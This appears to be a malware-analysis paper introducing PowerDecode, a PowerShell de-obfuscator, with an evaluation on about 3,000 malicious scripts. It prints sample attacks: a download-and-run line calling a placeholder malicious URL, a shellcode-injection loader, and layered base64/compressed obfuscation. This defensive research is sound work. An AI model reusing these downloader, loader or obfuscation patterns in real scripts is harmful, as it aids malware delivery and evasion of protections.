PowerDecode: A PowerShell Script Decoder Dedicated To Malware Analysis
Abstract
In recent years, PowerShell-based attacks have been widely employed to compromise
systems’ security. Attackers can easily hide such malicious scripts in file formats (e.g.,
Office document macros) that can be delivered via large-scale spam mail
campaigns. Moreover, attackers employ obfuscation techniques that allow the
PowerShell code to evade the most common anti-malware protections and perform
unauthorized actions that target the confidentiality, integrity and availability of an
information system. In this paper, we present PowerDecode, an open-source module for
the de-obfuscation and analysis of PowerShell scripts. In particular, this module
receives a script as input and returns its obfuscation layers, its original de-obfuscated
variant and a report about possible malicious activities. We tested PowerDecode on
almost 3000 malicious scripts, and the results showed significantly improved
de-obfuscation performance in comparison to state-of-the-art systems. More
specifically, PowerDecode was able to resolve multiple types of obfuscation and collect
important information about attacks, such as malicious URLs and IP addresses
contacted by malware. Finally, PowerDecode can be easily integrated into other malware
analysis systems, and can be a valuable aid in identifying malicious activities.
1 Introduction
Major anti-malware vendors have identified a large number of cyberattacks based on
the exploitation of PowerShell features. These attacks employ a technique known as "living off the
land", which consists of exploiting a legitimate tool in the victim's operating system for malicious
purposes. Cybercriminals prefer this attack mode essentially because PowerShell can launch
commands in a hidden way, loading machine code instructions directly into memory or establishing
a connection to a remote server. PowerShell is also a preferred attack vector because its scripting
language can be easily obfuscated. Obfuscation is a widely used technique to circumvent the most
common signature-based anti-malware protections [14], making the malicious code difficult to
detect. In 2016, the Symantec Blue Coat Malware Analysis Sandbox analyzed 49127 PowerShell
scripts and observed that 95.4% of them were malicious; in addition, 111 different types of malware
were identified among 4782 samples analyzed manually. According to statistics compiled by
Symantec, the year 2016 saw a sudden increase in attacks based on PowerShell scripts. Attackers were
observed embedding PowerShell scripts in Word file macros and sending them as attachments in spam
mails. When the victim opened the document, a PowerShell script would run in hidden mode,
starting the attack [1]. The years after 2016 saw a further increase in the use of PowerShell. According
to the report published by McAfee Labs about the most widespread web threats in 2019, PowerShell
showed a 460% increase, compared to the previous year, in use as an attack vector to compromise a
remote system [2]. In 2020, due to the health emergency caused by COVID-19, the spread of
PowerShell malware increased further. As observed by McAfee in the report published in November
2020, the global impact of COVID-19 prompted cybercriminals to adapt their campaigns to attract
victims with pandemic themes and to exploit the realities of a workforce working from home, and a
significant proliferation of attacks based on malicious Microsoft Office documents pushed new
PowerShell malware to rise by 117% [3]. PowerShell-based attacks are still a complex issue, especially
due to code obfuscation. To determine the extent of these attacks, it is often necessary to perform
code de-obfuscation and dynamic analysis. The current state of the art offers various open-source
tools dedicated to this purpose [4], [5], [6], [7]. However, as will be shown, these tools have some
algorithmic flaws that do not always allow the correct analysis of the malware. PowerDecode aims to
fill this gap. The implemented de-obfuscation algorithm, based on an accurate model of obfuscated
code, made it possible to de-obfuscate and analyze a large number of scripts on which pre-existing
tools failed. The rest of the paper is organized as follows: Section 2 provides a description of the main
features of PowerShell, including its scripting language and the concept of PowerShell malware.
Section 3 provides a classification of the main types of obfuscation achievable in PowerShell.
Section 4 provides an overview of the related work in the field. Section 5 describes the features of the
proposed system, PowerDecode. Section 6 discusses the results of the evaluation. Section 7 closes the
paper.
This work is supported by project SIMARGL (Secure intelligent methods for advanced recognition of malware,
stegomalware & information hiding methods, https://simargl.eu), which has received funding from the European
Union’s Horizon 2020 research and innovation programme under grant agreement No. 833042.
2 Background
PowerShell is an object-oriented command interpreter developed by Microsoft, and it is present on all
Windows-based operating systems, starting from Windows XP. The shell is based on the .NET
Common Language Runtime (CLR), and accepts and returns .NET objects [8]. PowerShell has been
designed for the following purposes:
• File system management and configuration;
• Programming using a scripting language;
• Management of registry keys.
In this section we give an overview of supported shell commands and we define the concept of
PowerShell malware.
2.1 Cmdlets
Cmdlets are characteristic PowerShell commands, which allow for interactions between users and
the shell. Their names follow a specific naming rule: each is composed of a verb and a noun
separated by a hyphen. PowerShell allows a cmdlet to be invoked through an alias
for easier typing. A set of aliases is defined by default, but users can also define new aliases
for a given cmdlet or redefine an existing alias. As PowerShell is an
object-oriented programming language, cmdlets can be treated as methods that receive objects as
input (or return them), and that can also be overridden. The most relevant cmdlets employed in the
context of this work are shown in Table 8 in Appendix A.
(new-object System.net.webclient).downloadfile(
'http://MaliciousUrl.com\malware.exe', 'file.exe');
Start-process 'file.exe'
Listing 1.1 shows an example of file-based malware. This code establishes a connection to a URL and
downloads a payload (an executable malicious file). Then, it runs the downloaded payload.
$c = @"
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint
y, uint z);
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v,
IntPtr w, IntPtr x, uint y, IntPtr z);
[DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr x, uint y, uint z);
[DllImport("kernel32.dll")] public static extern bool VirtualProtect(IntPtr lpAddress, uint
dwSize, uint flNewProtect, out uint lpflOldProtect);
"@
$o = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru
$x=$o::VirtualAlloc(0,0x1000,0x3000,0x04);
[Byte[]]$sc = 0xfc,0xe8,[truncated] 0xd5;
for ($i=0;$i -le ($sc.Length-1);$i++) {$o::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1) |
out-null;}
$oldprotect = 0;
$here=$o::VirtualProtect($x, [UInt32]0x1000, [UInt32]0x20, [Ref]$oldprotect);
$z=$o::CreateThread(0,0,$x,0,0,0);
Listing 1.2 shows an example of file-less malware. This code first imports the kernel32.dll and
msvcrt.dll libraries. Then, it declares a hexadecimal values array, which represents assembly
instructions (shellcode). Finally, a thread is created within a PowerShell process and the shellcode is
injected into this thread.
File-based malware requires the creation of a new file on the victim's storage device. This aspect
makes such attacks easier for anti-malware engines to detect. In addition, contacted URLs might be
recognized as malicious by checking for their presence in a blacklist. In contrast, file-less
malware does not need to create new files, as the payload is embedded in the code in the form of
hexadecimal instructions. All actions performed by file-less malware appear to be executed by the
legitimate “Powershell.exe” process. However, over the years, anti-malware software companies have
detected and analyzed numerous PowerShell attacks, obtaining relevant information to create
malware signatures with which it is possible to recognize even some file-less malware [10].
3 PowerShell Obfuscation
To evade the most common anti-malware protection measures, attackers usually employ several code
obfuscation techniques that aim to make the code hard to understand both for anti-malware
programs and for human users. Formally, obfuscation can be defined as an alteration of the code
syntax that keeps the semantics unchanged. Although there are infinite ways to obfuscate
a given code, the applicable techniques, according to the taxonomy proposed by Bohannon [11], [12],
can be classified into five different types:
• String-based: in this case, the code is manipulated as a string, applying string operations such as
concatenating, reordering, reversing or substring replacing. The resulting code, to be
executed, must be evaluated by the Invoke-Expression cmdlet or the “&” evaluation operator.
• Base64: it consists of the application of the base64 encoding standard. The resulting code, to
be executed, must be passed as input to the shell preceded by the “powershell” function call
and the flag “-e”.
• Encoded: this obfuscation type is performed by converting each individual character into the
matching entry of a column of the ASCII table [13] or by applying a cryptographic
algorithm. The resulting code, to be executed, must be evaluated by the Invoke-Expression
cmdlet.
• Compressed: it consists of the application of a data compression algorithm supported by
PowerShell [8]. The resulting code, to be executed, must be evaluated by the Invoke-Expression
cmdlet.
• Randomization: it is a weak form of obfuscation that consists of randomly inserting uppercase
characters, space characters, or symbols not interpreted by the shell [17].
Table 9 in Appendix B provides an example for each obfuscation type described.
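As a hedged illustration of three of the types above, the following Python sketch applies a string-based (reversal), a Base64 and an encoded (decimal ASCII codes) transformation to a sample command and then inverts each one. It only manipulates data and never executes PowerShell. The helper names (undo_reverse, undo_base64, undo_ascii) are hypothetical and are not taken from PowerDecode; the one PowerShell fact relied on is that the “-e” flag expects Base64 computed over the UTF-16LE bytes of the script.

```python
import base64

command = "Start-Process malware.exe"

# String-based: the text is reversed; an obfuscated script would reverse it
# again at run time and hand the result to Invoke-Expression.
reversed_form = command[::-1]

# Base64: "powershell -e" expects Base64 over the UTF-16LE bytes of the script.
base64_form = base64.b64encode(command.encode("utf-16-le")).decode("ascii")

# Encoded: every character is replaced by its decimal ASCII code.
ascii_form = [ord(ch) for ch in command]


def undo_reverse(text):
    """Invert the string-based (reversal) transformation."""
    return text[::-1]


def undo_base64(text):
    """Invert the Base64 transformation used by the -e flag."""
    return base64.b64decode(text).decode("utf-16-le")


def undo_ascii(codes):
    """Invert the decimal ASCII encoding."""
    return "".join(chr(code) for code in codes)


print(reversed_form)
print(base64_form)
print(ascii_form[:5])
```

Each inverse function recovers the original command, which is the property a static de-obfuscator relies on once it has recognized the obfuscation type.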
The PowerShell scripting language allows different obfuscation techniques to be applied recursively
to the same script. In this way, the resulting code could contain multiple obfuscation layers, but only
the first layer (the last obfuscation type applied) is visible. Listings 1.3, 1.4, 1.5 and 1.6 in
Appendix C show an example of a multi-layer obfuscated script.
4 Related Work
In the current state of the art there are different open-source tools dedicated to the de-obfuscation of
PowerShell malware. In this paper we consider PSDecode [6], [7] and PowerDrive [4], [5]. They both
perform de-obfuscation using two different techniques:
• Invoke-Expression cmdlet overriding: as seen above, a wide variety of obfuscations depend
on the Invoke-Expression cmdlet. By overriding this cmdlet it is possible to
force the script execution to return the string it was trying to convert into a statement.
• Regular expressions: this technique consists of assuming common patterns that occur in
string obfuscation. These patterns are detected in the code and removed. In this way it is
possible to reconstruct the original script.
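The regular-expression technique can be sketched as follows. This is a minimal Python illustration under stated assumptions, not the pattern set used by PSDecode, PowerDrive or PowerDecode: the two patterns (single-quoted string concatenation and padding backticks) and the function names are hypothetical choices made for the example.

```python
import re

# 'abc' + 'def'  ->  'abcdef' (single-quoted literals only, for simplicity)
CONCAT_PATTERN = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")

# A backtick is PowerShell's escape character. Before most letters it has no
# effect, so it is often used as padding. Backticks that start a real escape
# sequence (`n, `t, `r, ...) are deliberately left untouched.
TICK_PATTERN = re.compile(r"`(?![0abefnrtvu])")


def join_concatenations(code):
    """Repeatedly merge adjacent string literals until nothing changes."""
    previous = None
    while previous != code:
        previous = code
        code = CONCAT_PATTERN.sub(
            lambda m: "'" + m.group(1) + m.group(2) + "'", code
        )
    return code


def strip_padding_ticks(code):
    """Remove backticks that do not introduce an escape sequence."""
    return TICK_PATTERN.sub("", code)


print(join_concatenations("'Sta'+'rt-Pro' + 'cess'"))
print(strip_padding_ticks("Invo`ke-Expre`ssion"))
```

Because such rewriting changes the code syntax, applying it before all Invoke-Expression dependent layers are resolved can break the script, which is relevant to the ordering issue discussed in the evaluation.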
However, these tools do not employ these techniques optimally, which in some cases makes it
impossible to resolve certain types of obfuscation, such as string-based format applied across multiple layers.
5 Introducing PowerDecode
PowerDecode is a tool dedicated to de-obfuscating PowerShell scripts, which are typically
obfuscated across multiple layers. Similarly to previously proposed tools, it combines cmdlet
overriding with regular expressions. The PowerDecode de-obfuscation algorithm is based
on an accurate model of obfuscation, ideally represented by a unary syntax tree. Thanks to its implicit
knowledge of this data structure, PowerDecode is able to resolve all obfuscations that can be generated
by Invoke-Obfuscation [11]. All results obtained from the analysis are saved in a text report file.
6. DeobfuscatebyRegex: consider the last stored layer and de-obfuscate it by applying regular
expressions to remove obfuscation residuals. If the resulting code has changed, store this
layer;
Finally, having the plaintext code and its obfuscation layers available, the MalwareAnalysis stage of
the PowerDecode algorithm performs the following three steps:
• Some specific patterns are applied to each stored layer, which is then identified by a label
that represents the obfuscation type (string-based, base64, encoded, compressed). All layers
with their respective labels are written to the report file;
• If the code contains URLs, the system extracts them and connects to each one to
check the related HTTP response status code. In this way, active and offline URLs are
distinguished and written to the report file;
• If the malware injects shellcode into memory, the related hexadecimal instructions are extracted
and written to the report file.
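The last two steps can be sketched in Python as follows. This is an assumption-laden illustration rather than PowerDecode's implementation: the regular expressions, the function names (extract_urls, extract_shellcode, http_status) and the sample string with its example.test URL are all hypothetical, and the shellcode pattern only covers the `[Byte[]]$var = 0x..,0x..` form seen in Listing 1.2.

```python
import re
import urllib.error
import urllib.request

URL_PATTERN = re.compile(r"https?://[^\s'\"<>()]+", re.IGNORECASE)
BYTE_ARRAY_PATTERN = re.compile(
    r"\[Byte\[\]\]\s*\$\w+\s*=\s*((?:0x[0-9a-f]{1,2}\s*,\s*)*0x[0-9a-f]{1,2})",
    re.IGNORECASE,
)


def extract_urls(code):
    """Return the distinct URLs found in the code, in order of appearance."""
    urls = []
    for url in URL_PATTERN.findall(code):
        if url not in urls:
            urls.append(url)
    return urls


def extract_shellcode(code):
    """Return the bytes of the first [Byte[]] hexadecimal array, if any."""
    match = BYTE_ARRAY_PATTERN.search(code)
    if match is None:
        return b""
    tokens = re.findall(r"0x[0-9a-f]{1,2}", match.group(1), re.IGNORECASE)
    return bytes(int(token, 16) for token in tokens)


def http_status(url, timeout=5):
    """Return the HTTP status code for url, or None if it is unreachable."""
    request = urllib.request.Request(url, method="HEAD")
    try:
        with urllib.request.urlopen(request, timeout=timeout) as response:
            return response.status
    except urllib.error.HTTPError as error:
        return error.code
    except (urllib.error.URLError, OSError, ValueError):
        return None


# Hypothetical de-obfuscated layer used only to exercise the extractors.
sample = (
    "(New-Object Net.WebClient).DownloadFile("
    "'http://example.test/payload.exe','file.exe');"
    "[Byte[]]$sc = 0xfc,0xe8,0x89,0x00;"
)
print(extract_urls(sample))
print(extract_shellcode(sample).hex())
```

The network check is kept in a separate function so that extraction can be run offline; calling http_status against live malware infrastructure should only be done from an isolated analysis environment.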
The evaluation function $f_i$ can take different forms depending on the obfuscation at the i-th layer.
We distinguish between two major cases:
• i-th layer containing base64 obfuscation: the evaluation function $f_i$ coincides with the
“powershell” function call preceding the encoded base64 string;
• i-th layer containing string-based, encoded or compressed obfuscation: the evaluation
function $f_i$ coincides with the “Invoke-Expression” cmdlet.
As a code string, $f_i$ could itself be obfuscated using randomization or string-based format.
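To make the last remark concrete, the Python sketch below resolves two obfuscated forms of the evaluation function that appear in the example discussed later in this section: `$enV:comsPEC[4,15,25]-Join''` and `$shELLid[1]+$sHeLlId[13]+'X'`. It assumes the usual default values of the two variables (`C:\Windows\system32\cmd.exe` for `$env:ComSpec` and `Microsoft.PowerShell` for `$ShellId`); on a system where these differ, the result would differ as well. The helper names are hypothetical.

```python
# Assumed default values of the PowerShell variables involved.
COMSPEC = r"C:\Windows\system32\cmd.exe"   # $env:ComSpec (assumption)
SHELL_ID = "Microsoft.PowerShell"          # $ShellId (assumption)


def pick(text, indexes):
    """Mimic $text[i, j, k] -Join '' by concatenating the indexed characters."""
    return "".join(text[i] for i in indexes)


def is_invoke_expression(name):
    """PowerShell command names are case-insensitive; iex is the default alias."""
    return name.lower() in {"iex", "invoke-expression"}


# & ( $enV:comsPEC[4,15,25]-Join'')
f2 = pick(COMSPEC, [4, 15, 25])

# & ( $shELLid[1]+$sHeLlId[13]+'X')
f3 = SHELL_ID[1] + SHELL_ID[13] + "X"

print(f2, is_invoke_expression(f2))   # iex True
print(f3, is_invoke_expression(f3))   # ieX True
```

Both expressions rebuild the alias of Invoke-Expression character by character, so a signature looking for the literal cmdlet name would not match them.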
The code block $(c_i, d_i)$ consists of the following parts:
• $c_i$: a sub-block of obfuscated code, containing unreadable data;
• $d_i$: a sub-block of code containing information about the obfuscation technique
applied in the current layer, necessary for the conversion of $c_i$ into meaningful data, i.e., to
reconstruct the next layer at runtime.
The obfuscated script execution takes place according to the following dynamic:
$$f_i(c_i, d_i) = f_{i+1}(c_{i+1}, d_{i+1}), \qquad 1 \le i \le N-1$$
where $f_{i+1}(c_{i+1}, d_{i+1})$ is the obfuscated code at layer $i+1$. It coincides with the value returned by
the execution of the code block $f_i(c_i, d_i)$ for $1 \le i \le N-1$.
If $i = N$, we obtain $f_N(c_N, d_N) = c_N$, corresponding to a code block at layer N without any
dependence on an evaluation function. The execution of the code $c_N$ results in the execution of the
PowerShell commands contained in it.
To demonstrate the applicability of this model, let us consider the example shown in Listings 1.3, 1.4,
1.5 and 1.6.
The 1st obfuscation layer, $f_1(c_1, d_1)$, contains base64 encoding, with “powershell” as the evaluation
function and the “-e” flag as $d_1$.
Component   Syntax
$f_1$       powershell
$c_1$       IAAoAE4ARQBXAC{...truncated...}AJwApAA==
$d_1$       -e
The execution of the code $f_1(c_1, d_1)$ returns the code $f_2(c_2, d_2)$ corresponding to the 2nd obfuscation
layer, containing compressed format with an obfuscated form of Invoke-Expression as evaluation
function. In $d_2$, <c_2> marks the position where the string $c_2$ is embedded.
Component   Syntax
$f_2$       & ( $enV:comsPEC[4,15,25]-Join'')
$c_2$       09BQqjavrTaprTaorTasrTarrTaurTaqrTatVdJNU1AvUtdRz09OBZKJRal6QKpYITcxpxzICADi1AqQTDEQB5ckFpXoqmtqKtQoqCloKKgUZ7j6+GSmRBvGaqsUe6T65HgC2cax2uoR6poA
$d_2$       (NEW-OBJECt IO.cOmpREsSIon.DEflAtestreAM( [io.MEMORYstReAm]
            [SysTeM.COnvErt]::frOmbASE64StrING('<c_2>' )
            ,[io.COMprEssIoN.cOMpRESSIonMoDe]::DEcOmPREsS )| %{NEW-OBJECt
            SYsteM.iO.streamREAdER( $_ , [teXT.Encoding]::asCii)}).ReadTOeND()|
The execution of the code $f_2(c_2, d_2)$ returns the code $f_3(c_3, d_3)$ corresponding to the 3rd obfuscation
layer, containing string-based format with an obfuscated form of Invoke-Expression as evaluation
function.
Component   Syntax
$f_3$       & ( $shELLid[1]+$sHeLlId[13]+'X')
$c_3$       ('r','oce','are.','s malw','P','exe','s','Start-')
$d_3$       "{7}{4}{0}{1}{6}{3}{2}{5}"-f
The execution of the code $f_3(c_3, d_3)$ returns the code $f_4(c_4, d_4) = c_4$ corresponding to the code in
its original form, containing a command directly executable by the shell.
Component   Syntax
$f_4$       -
$c_4$       Start-process malware.exe
$d_4$       -
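The layer-by-layer dynamic of this example can be imitated statically in Python. The sketch below is a simplification under stated assumptions: it resolves the third layer with the values of $c_3$ and $d_3$ shown above, then wraps the result in two freshly built outer layers (raw DEFLATE plus Base64, then Base64 over UTF-16LE) and peels them off again. Only the payload $c_i$ is passed between layers, with $f_i$ and $d_i$ folded into the decoder chosen for each layer; the function names are hypothetical and the paper's original Base64 payload is not decoded here.

```python
import base64
import zlib


def raw_deflate(data):
    """Compress with raw DEFLATE (no zlib header), the stream format that
    .NET's DeflateStream reads and writes."""
    compressor = zlib.compressobj(wbits=-15)
    return compressor.compress(data) + compressor.flush()


def decode_base64_layer(c):
    """Base64 layer: what 'powershell -e' would decode (UTF-16LE text)."""
    return base64.b64decode(c).decode("utf-16-le")


def decode_compressed_layer(c):
    """Compressed layer: Base64 -> raw DEFLATE -> ASCII text."""
    return zlib.decompress(base64.b64decode(c), wbits=-15).decode("ascii")


def decode_format_layer(c, d):
    """String-based layer: equivalent of PowerShell's  d -f c  operator."""
    return d.format(*c)


# Third layer, using the values of c_3 and d_3 from the example.
c3 = ['r', 'oce', 'are.', 's malw', 'P', 'exe', 's', 'Start-']
d3 = "{7}{4}{0}{1}{6}{3}{2}{5}"
plaintext = decode_format_layer(c3, d3)

# Build two outer layers around the plaintext (illustrative data only).
c2 = base64.b64encode(raw_deflate(plaintext.encode("ascii"))).decode("ascii")
c1 = base64.b64encode(c2.encode("utf-16-le")).decode("ascii")

# Peel the layers in order, storing every intermediate result.
layers = [c1]
for evaluate in (decode_base64_layer, decode_compressed_layer):
    layers.append(evaluate(layers[-1]))

print(plaintext)     # Start-Process malware.exe
print(layers[-1])    # Start-Process malware.exe
```

Storing every intermediate layer, as the list above does, mirrors the way the obfuscation layers are kept for the report.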
6 Experimental Evaluation
To compare the performance of PowerDecode with that attained by similar
tools (PowerDrive and PSDecode) [5], [7], we employed a dataset of 2906 malicious PowerShell
scripts extracted from macros embedded in malicious MS Office documents obtained from
VirusTotal. The results of these tests are shown in Table 5.
Based on the results obtained in comparison to PowerDrive and PSDecode, PowerDecode was able to
resolve a wider range of obfuscations. In particular, the following critical issues were observed:
• Altering the code syntax with regular expressions before removing all Invoke-Expression dependent
obfuscation layers may generate errors when cmdlet overriding is applied. The PowerDecode
algorithm, unlike the others, applies regular expressions as a final stage, only after all
Invoke-Expression dependent layers have been removed. In this way, PowerDecode successfully resolved
all Invoke-Expression dependent obfuscation layers.
• Similarly to PowerDrive, PowerDecode implements a base64 encoding recognizer. This feature
made it possible to manage this encoding more efficiently. Conversely, PSDecode tries to
immediately decode the script to verify whether it was base64 encoded. This strategy failed in many
cases.
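The difference between recognizing base64 and blindly decoding can be illustrated with the following Python sketch. The paper does not describe how the PowerDecode recognizer works, so the checks below (alphabet and padding shape, length multiple of four, strict decoding, and a UTF-16LE text check) are assumptions chosen for the example, and the function name is hypothetical.

```python
import base64
import binascii
import re

BASE64_SHAPE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def looks_like_base64_script(text, min_length=16):
    """Heuristically decide whether text is a Base64-encoded PowerShell script."""
    candidate = text.strip()
    # Cheap structural checks first: length and alphabet.
    if len(candidate) < min_length or len(candidate) % 4 != 0:
        return False
    if not BASE64_SHAPE.match(candidate):
        return False
    try:
        raw = base64.b64decode(candidate, validate=True)
    except (binascii.Error, ValueError):
        return False
    # Payloads for "powershell -e" are UTF-16LE text.
    try:
        decoded = raw.decode("utf-16-le")
    except UnicodeDecodeError:
        return False
    return all(ch.isprintable() or ch in "\r\n\t" for ch in decoded)


encoded = base64.b64encode(
    "Start-Process malware.exe".encode("utf-16-le")
).decode("ascii")

print(looks_like_base64_script(encoded))                      # True
print(looks_like_base64_script("Start-Process malware.exe"))  # False
```

Checking the shape before decoding avoids treating plain script text as an encoded payload, which is the failure mode attributed above to immediate decoding.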
A few scripts were not completely de-obfuscated, as they contained obfuscation types not dependent on
Invoke-Expression. However, these cases are infrequent and their syntax often remains
understandable. One feature that proved to be important for statistical purposes is the obfuscation
recognizer implemented by PowerDecode. In particular, it made it possible to classify 6018 detected
layers and to compile statistics on the most used obfuscation techniques. Table 6 shows the results
of these statistics.
Likewise, the cmdlet overriding implemented by PowerDecode made it possible to intercept and record
the actions performed by each malware sample. Table 7 shows the results of this analysis.
Most of the scripts analyzed were found to belong to the file-based category. Only 30 of the scripts
analyzed (1%) were found to belong to the file-less type.
powershell -e
IAAoAE4ARQBXAC0ATwBCAEoARQBDAHQAIAAgAEkATwAuAGMATwBtAHAAUgBFAHMAUwBJAG8AbgAuAEQARQBmAGwAQQB
0AGUAcwB0AHIAZQBBAE0AKAAgAFsAaQBvAC4ATQBFAE0ATwBSAFkAcwB0AFIAZQBBAG0AXQAgAFsAUwB5AHMAVABlAE
0ALgBDAE8AbgB2AEUAcgB0AF0AOgA6AGYAcgBPAG0AYgBBAFMARQA2ADQAUwB0AHIASQBOAEcAKAAnADAAOQBCAFEAc
QBqAGEAdgByAFQAYQBwAHIAVABhAG8AcgBUAGEAcwByAFQAYQByAHIAVABhAHUAcgBUAGEAcQByAFQAYQB0AFYAZABK
AE4AVQAxAEEAdgBVAHQAZABSAHoAMAA5AE8AQgBaAEsASgBSAGEAbAA2AFEASwBwAFkASQBUAGMAeABwAHgAegBJAEM
AQQBEAGkAMQBBAHEAUQBUAEQARQBRAEIANQBjAGsARgBwAFgAbwBxAG0AdABxAEsAdABRAG8AcQBDAGwAbwBLAEsAZw
BVAFoANwBqADYAKwBHAFMAbQBSAEIAdgBHAGEAcQBzAFUAZQA2AFQANgA1AEgAZwBDADIAYwBhAHgAMgB1AG8AUgA2A
HAAbwBBACcAIAApACAALABbAGkAbwAuAEMATwBNAHAAcgBFAHMAcwBJAG8ATgAuAGMATwBNAHAAUgBFAFMAUwBJAG8A
bgBNAG8ARABlAF0AOgA6AEQARQBjAE8AbQBQAFIARQBzAFMAIAApAHwAIAAlAHsATgBFAFcALQBPAEIASgBFAEMAdAA
gACAAUwBZAHMAdABlAE0ALgBpAE8ALgBzAHQAcgBlAGEAbQBSAEUAQQBkAEUAUgAoACAAJABfACAALAAgAFsAdABlAF
gAVAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBhAHMAQwBpAGkAKQB9ACkALgBSAGUAYQBkAFQATwBlAE4ARAAoACkAf
AAgACYAIAAoACAAJABlAG4AVgA6AGMAbwBtAHMAUABFAEMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8AaQBuACcAJwAp
AA==
Start-Process malware.exe
References
[1] Symantec, “The increased use of PowerShell in attacks”, [Online]. Available:
https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/increased-use-of-powershell-in-attacks-16-en.pdf
[2] McAfee, “McAfee Labs Threats Report, August 2019”, [Online]. Available:
https://www.mcafee.com/enterprise/en-us/assets/reports/rp-quarterly-threats-aug-2019.pdf
[3] McAfee, “McAfee Sees COVID-19-Themed Threats and PowerShell Malware Surge in Q2 2020”, [Online]. Available:
https://ir.mcafee.com/node/6571/pdf
[4] D. Ugarte, D. Maiorca, F. Cara, G. Giacinto, “PowerDrive: Accurate De-Obfuscation and Analysis of PowerShell
Malware”, 16th Conference on Detection of Intrusions and Malware & Vulnerability Assessment (DIMVA). Springer,
Gothenburg, Sweden, pp. 240-259, 2019.
[5] D. Ugarte, “PowerDrive”, [Online]. Available: https://github.com/denisugarte/PowerDrive
[6] R3MRUM, “From Emotet, PSDecode is born!”, [Online]. Available:
https://r3mrum.wordpress.com/2017/12/15/from-emotet-psdecode-is-born/
[7] R3MRUM, “PSDecode”, [Online]. Available: https://github.com/R3MRUM/PSDecode
[8] Microsoft, “PowerShell Documentation”, [Online]. Available: https://docs.microsoft.com/en-us/powershell/
[9] McAfee, “Fileless Malware Execution with PowerShell Is Easier than You May Realize”, [Online]. Available:
https://www.mcafee.com/enterprise/en-us/assets/solution-briefs/sb-fileless-malware-execution.pdf
[10] Chronicle Security, “VirusTotal”, [Online]. Available: https://www.virustotal.com
[11] D. Bohannon, “Invoke-Obfuscation”, [Online]. Available: https://github.com/danielbohannon/Invoke-Obfuscation
[12] D. Bohannon, “PowerShell Command Line Argument Obfuscation Techniques”, [Online]. Available:
https://nullcon.net/website/archives/pdf/goa-2017/invoke-obfuscation-nullcon-2017.pdf
[13] ASCII Table, [Online]. Available: https://upload.wikimedia.org/wikipedia/commons/d/dd/ASCII-Table.svg
[14] A. Mujumdar, G. Masiwal and B. Meshram, “Analysis of Signature-Based and Behavior-Based Anti-Malware Approaches”,
International Journal Of Advance Research, Ideas And Innovations In Technology, 2019.
[15] M. Nelson, “Powershell-Payload-Excel-Delivery”, [Online]. Available: https://github.com/enigma0x3/Powershell-Payload-Excel-Delivery
[16] S. Pontiroli, R. Martinez, “The Tao of .NET and PowerShell Malware Analysis”, VB2015, the 25th Virus Bulletin
International Conference, 2015.
[17] D. Hendler, S. Kels and A. Rubin, “AMSI-Based Detection of Malicious PowerShell Code Using Contextual Embeddings”,
ACM Asia Conference on Computer and Communications Security, 2020.
[18] C. Liu, B. Xia, M. Yu, Y. Liu, “PSDEM: A Feasible De-Obfuscation Method for Malicious PowerShell Detection”, IEEE
Symposium on Computers and Communications (ISCC), 2018.
[19] Z. Li, Q. Chen, C. Xiong, Y. Chen, T. Zhu, H. Yang, “Effective and Light-Weight Deobfuscation and Semantic-Aware Attack
Detection for PowerShell Scripts”, ACM SIGSAC Conference on Computer and Communications Security, 2019.
[20] M. Graeber, “PowerShellArsenal”, [Online]. Available: https://github.com/mattifestation/PowerShellArsenal
[21] G. Malandrone, “Studio e Sviluppo di un Rilevatore di Attacchi Avanzati Basati su PowerShell”, Master thesis, 2020.
[22] G. Malandrone, “PowerDecode”, [Online]. Available: https://github.com/Malandrone/PowerDecode